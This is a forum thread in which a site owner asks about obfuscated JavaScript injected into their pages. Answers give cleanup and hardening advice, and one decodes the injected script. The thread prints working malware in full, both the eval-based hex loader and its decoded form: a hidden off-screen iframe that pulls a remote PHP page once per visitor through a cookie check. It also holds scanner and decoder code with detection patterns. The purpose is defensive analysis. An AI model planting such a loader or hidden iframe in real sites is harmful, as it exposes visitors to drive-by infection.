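Website hacked with JavaScript code

Time: 2013-08-30 18:14:36

Tags: javascript security

Many of the websites I manage have been hacked, and the following JavaScript code has been inserted into every web page. I don't know how to decode this or even what it does, so I don't know how serious it is. Can anyone help?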

<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3
e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,
85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>

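I assume these are character references and that it actually points to a website with some malicious content, but I don't know how to resolve it. I'm going through and removing all of these and changing all the passwords to prevent further security problems, but any advice on this would be much appreciated!

Thanks.

3 Answers:

Answer 0: (score: 2)

In my experience, these kinds of attacks happen on shared hosting servers, where an automated bot has either guessed the account's password, or malware on the account holder's desktop has captured the credentials and is now abusing them.

Your best option? Accept that this will certainly have an impact on your users, then do your due diligence:

  • If you are not the owner, notify your shared host.
  • Archive the entire home directory of the shared hosting account, including the contents of that user's cron jobs, databases, email and other information. (e.g. tar -czf website-$(date +%F).tar.gz ~/ or your shared host's backup utility.)
  • Check for any malicious processes or scripts that may be running. ps gaux is your friend.
  • Everything in the shared hosting account
  • Change every password, even if you think it could not have been affected.
  • Recreate the account and give users a maintenance page. You should have a backup of the account.
  • Unpack the backup in a virtual machine and investigate everything, including logs and other information, to discover how the attack happened. Apply what you learn to your website code.
  • Redeploy your code with fixes, taking into account the cause you discovered in the previous step; if your account uses a framework such as Joomla, Drupal, Wordpress or similar, take the time to upgrade to the latest version.

Don't skip steps, or it will happen again.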
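For the step of investigating the unpacked backup, the following Node.js sketch lists which files carry the injected loader and when they were last modified, so the timestamps can be compared with the server logs. It is an added example, not part of the answer above; the file extension list and the threshold of 40 hex values are assumptions, and the two patterns are taken from the script shown in the question.

```javascript
const fs = require('fs');
const path = require('path');

// Two traits of the loader on this page: a quoted run of comma-separated hex
// values that is split on ",", and fromCharCode assembled from string pieces.
const HEX_RUN = /"(?:[0-9a-f]{2},\s*){40,}[0-9a-f]{1,2}"\s*\.split\(","\)/i;
const FROMCHARCODE_SPLIT = /\[\s*"fr"\s*\+\s*"omCh"\s*\+\s*"arCo"\s*\+\s*"de"\s*\]/;
// Assumed set of file types that are served as pages or included by them.
const TEXT_EXT = new Set(['.html', '.htm', '.php', '.js', '.tpl', '.inc']);

// Return the names of the traits found in one file's text.
function classify(text) {
  const hits = [];
  if (HEX_RUN.test(text)) hits.push('hex-run');
  if (FROMCHARCODE_SPLIT.test(text)) hits.push('split-fromCharCode');
  return hits;
}

// Walk the unpacked archive without following symlinks and report matches.
function scanTree(root) {
  const findings = [];
  const stack = [root];
  while (stack.length) {
    const dir = stack.pop();
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isSymbolicLink()) continue;
      if (entry.isDirectory()) { stack.push(full); continue; }
      if (!entry.isFile()) continue;
      if (!TEXT_EXT.has(path.extname(entry.name).toLowerCase())) continue;
      // latin1 never throws on odd bytes, so binary-ish files are still scanned
      const hits = classify(fs.readFileSync(full, 'latin1'));
      if (hits.length) {
        findings.push({
          file: path.relative(root, full),
          hits,
          mtime: fs.statSync(full).mtime.toISOString(),
        });
      }
    }
  }
  return findings.sort((a, b) => a.file.localeCompare(b.file));
}
```

Run it against the copy extracted inside the virtual machine, for example `scanTree('/path/to/unpacked-backup')`, rather than against the live account.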

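Answer 1: (score: 1)

This is what was injected. To decipher it, do the same thing the JavaScript in your post does: split the string on commas into hex strings, then parseInt each one with base 16, subtract 22, and look up the character for that char code. How it is being used maliciously, I'm not sure. Does anyone have any ideas?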

function v09() {
    var static = 'ajax';
    var controller = 'index.php';
    var v = document.createElement('iframe');
    v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
    v.style.position = 'absolute';
    v.style.color = '968';
    v.style.height = '968px';
    v.style.width = '968px';
    v.style.left = '1000968';
    v.style.top = '1000968';
    if (!document.getElementById('v')) {
        document.write('<p id=\'v\' class=\'v09\' ></p>');
        document.getElementById('v').appendChild(v);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0)
        nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue)
    + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
    (name != document.cookie.substring(0, name.length)))
    {
        return null;
    }
    if (start == -1)
        return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1)
        end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}

if (navigator.cookieEnabled)
{
    if (GetCookie('visited_uq') == 55) {
    } else {
        SetCookie('visited_uq', '55', '1', '/');
        v09();
    }
}
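The decoding steps described in this answer can be carried out statically, without letting the injected script call eval. The sketch below is an added example, not code from the answer or from the injected script; `decodeLoader`, `extractIndicators`, `encodeForDemo` and `SAMPLE` are names made up here, and `SAMPLE` is a short constructed input using the same encoding, with a placeholder URL.

```javascript
// Builds the constructed sample only: char code + 22, written as hex.
function encodeForDemo(text) {
  return Array.from(text, c => (c.charCodeAt(0) + 22).toString(16)).join(',');
}
// Constructed sample in the shape of the loader from the question.
const SAMPLE =
  'if(document.querySelector)k=4;z=("' +
  encodeForDemo("var v = document.createElement('iframe');\r\n" +
                "v.src = 'http://malicious.example/x.php';") +
  '".split(","));for(i=0;i<z["length"];i+=1){z[i]=-(22)+parseInt(z[i],k*4);}';

// Pull the quoted hex list and the "-(N)+parseInt" offset out of the script
// text and apply the arithmetic ourselves. The script is never executed.
// radix 16 mirrors the loader's 4*4; the offset falls back to the page's 22.
function decodeLoader(scriptText, radix = 16) {
  const list = /\(\s*"([0-9a-f,\s]+)"\s*\.split\(","\)/i.exec(scriptText);
  if (!list) return null;                      // not this obfuscation scheme
  const off = /-\((\d+)\)\s*\+\s*parseInt/.exec(scriptText);
  const offset = off ? Number(off[1]) : 22;
  const codes = list[1].replace(/\s+/g, '').split(',')
    .map(h => parseInt(h, radix) - offset);
  if (codes.some(c => Number.isNaN(c) || c < 0)) return null;
  return codes.map(c => String.fromCharCode(c)).join('');
}

// Summarise what the decoded text would do, for triage and for blocklists.
function extractIndicators(decoded) {
  return {
    urls: decoded.match(/https?:\/\/[^\s'"<>]+/g) || [],
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/.test(decoded),
    writesCookie: /document\.cookie\s*=/.test(decoded),
  };
}
```

Applied to the decoded text posted in this answer, the same checks report one URL, an iframe creation and a cookie write, which matches a hidden iframe loaded once per visitor per day.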

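Answer 2: (score: 0)

This kind of thing happened to me too. I wasn't using a shared hosting solution; I was on a dedicated server, and there was no evidence of any FTP, SSH or SCP activity.

I realized that someone had used one of my forms for code injection (my site is PHP). This can be done using your own code, by supplying input to a text box or text field that will be interpreted by some code on the server.

For example, you might have a small form that lets people upload files to some directory. Someone could upload a code file and then execute it, and that code file could be the culprit that injects JavaScript code into your own pages.

In this instance you can restrict which file types are allowed to be uploaded, put the files in a directory that the browser cannot access directly, or make sure the files do not have execute permission when they are uploaded.

You can also make sure to sanitize inputs, so that any form of malicious text is rendered ineffective.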